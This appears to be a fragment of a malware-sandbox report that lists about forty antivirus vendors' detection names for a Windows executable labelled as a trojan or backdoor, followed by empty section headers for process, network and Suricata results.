Cylance	Unsafe
Sangfor	Suspicious.Win32.Save.a
CrowdStrike	win/malicious_confidence_100% (W)
K7GW	Trojan ( 005c36431 )
K7AntiVirus	Trojan ( 005c36431 )
Arcabit	Trojan.Doina.D1495D
Symantec	Trojan.Whispergate
Elastic	malicious (high confidence)
ESET-NOD32	a variant of Win32/Agent.AHAN
APEX	Malicious
Paloalto	generic.ml
Cynet	Malicious (score: 100)
Alibaba	Trojan:Win32/BackdoorX.71a23315
Rising	Backdoor.Convagent!8.123DC (CLOUD)
Sophos	Mal/Generic-S
F-Secure	Trojan.TR/AD.Nekark.vsdpm
DrWeb	Trojan.MulDrop29.26479
VIPRE	Gen:Variant.Doina.84317
McAfeeD	Real Protect-LS!58D3A0D574E3
Emsisoft	Gen:Variant.Doina.84317 (B)
SentinelOne	Static AI - Malicious PE
FireEye	Generic.mg.58d3a0d574e37dc9
Google	Detected
Avira	TR/AD.Nekark.vsdpm
Antiy-AVL	Trojan/Win32.Agent
Gridinsoft	Ransom.Win32.Wacatac.sa
Microsoft	Trojan:Win32/Wacatac.B!ml
GData	Gen:Variant.Doina.84317
Varist	W32/ABTrojan.APOM-5687
AhnLab-V3	Trojan/Win.Doina.C5740788
DeepInstinct	MALICIOUS
Malwarebytes	Malware.AI.4210650245
Ikarus	Trojan.Win32.Agent
TrendMicro-HouseCall	Trojan.Win32.VSX.PE04C9V
Tencent	Win32.Backdoor.Pmax.Hmnw
huorong	Trojan/Agent.cca
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	Malicious_Behavior.SB
Panda	Trj/Chgt.AD
alibabacloud	Backdoor:Win/PMax.gyf

sss81242.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All